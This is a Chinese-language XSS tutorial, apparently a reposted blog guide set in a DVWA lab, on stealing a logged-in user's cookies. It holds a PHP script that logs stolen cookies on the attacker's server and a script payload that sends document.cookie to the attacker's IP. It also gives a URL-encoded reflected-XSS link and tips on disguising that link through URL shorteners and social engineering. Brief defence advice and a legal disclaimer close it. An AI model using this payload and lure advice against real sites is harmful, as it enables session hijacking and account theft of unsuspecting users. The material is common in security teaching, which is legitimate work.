利用XSS漏洞获取对方cookie(测试通过20190908)
字数 865 2025-08-18 11:38:56
XSS漏洞利用:获取对方Cookie的完整指南
1. 环境准备
1.1 所需系统及IP配置
- 攻击机:Kali Linux (192.168.80.136)
- 目标机1:Windows 7 (192.168.80.130)
- 目标机2:Metasploitable (192.168.80.129) - 运行DVWA(Damn Vulnerable Web Application)
1.2 工具准备
- Web服务器(Apache/Nginx) - 用于托管cookie接收脚本
- 文本编辑器 - 用于编写和查看脚本
2. Cookie接收脚本设置
2.1 脚本内容
<?php
$ck = $_GET['cookie'];
error_log("$ck\n", 3, "cookie.txt");
?>
2.2 部署步骤
- 将脚本保存为
get.php - 放置在Kali Linux的
/var/www/html目录下 - 设置目录权限:
chmod 777 /var/www/html
3. XSS漏洞利用过程
3.1 漏洞利用代码
<script>newImage().src="http://192.168.80.136/get.php?cookie="+document.cookie;</script>
3.2 攻击步骤
- 目标用户登录DVWA
- 访问存在XSS漏洞的页面
- 在输入框中提交上述JavaScript代码
- 提交后,代码会自动执行,将用户的cookie发送到攻击者的服务器
4. 结果查看
在Kali Linux上查看获取的cookie:
cat /var/www/html/cookie.txt
5. 高级利用技巧
5.1 URL伪装
原始攻击URL示例:
http://192.168.80.129/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Enew+Image%28%29.src%3D%22http%3A%2F%2F192.168.80.136%2Fget.php%3Fcookie%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E#
伪装方法:
- 使用URL缩短服务
- 将链接嵌入图片或其他看似无害的元素中
- 通过社交工程诱使用户点击
5.2 攻击条件
- 目标用户必须已登录目标网站(DVWA)
- 目标网站存在存储型或反射型XSS漏洞
- 目标用户的浏览器未启用严格的CSP(Content Security Policy)
6. 防御措施
6.1 对开发者的建议
- 对所有用户输入进行过滤和转义
- 设置HttpOnly标志的cookie
- 实施CSP策略
- 使用X-XSS-Protection头
6.2 对用户的建议
- 保持浏览器更新
- 使用XSS防护插件
- 不点击可疑链接
- 定期清除cookie
7. 法律与道德声明
本教程仅用于教育目的和安全研究,未经授权对他人系统进行测试或攻击是违法行为。进行安全测试前必须获得系统所有者的明确许可。